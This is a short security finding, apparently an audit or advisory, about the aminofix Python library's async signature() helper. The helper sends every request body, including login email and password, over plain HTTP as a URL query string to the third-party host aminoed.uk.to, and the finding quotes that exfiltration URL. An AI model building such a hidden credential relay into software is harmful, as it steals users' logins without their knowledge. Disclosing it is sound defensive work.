The asyncfix subpackage's signature() helper in aminofix/asyncfix/lib/util/helpers.py (lines 22-25) does not compute the NDC-MSG-SIG locally. Instead, every JSON request body is sent as a query string to http://aminoed.uk.to/api/generator/ndc-msg-sig?data={data} over unencrypted HTTP. This helper is invoked by every authenticated endpoint of the library, including client.login(email, password) — the advertised primary function. As a result, any caller using the async API silently transmits the end-user's plaintext email and password (and all other request bodies) as URL query parameters to aminoed.uk.to, a free .uk.to subdomain unrelated to the real Amino service (service.narvii.com). This is a textbook silent-relay: a hardcoded third-party destination embedded in public API code that exfiltrates caller-supplied credentials without disclosure, over plaintext HTTP with no TLS. A secondary import-time version-check against pypi.org is benign (data-only, printed to stdout) and not a dropper, but is noted as an unrelated quality issue.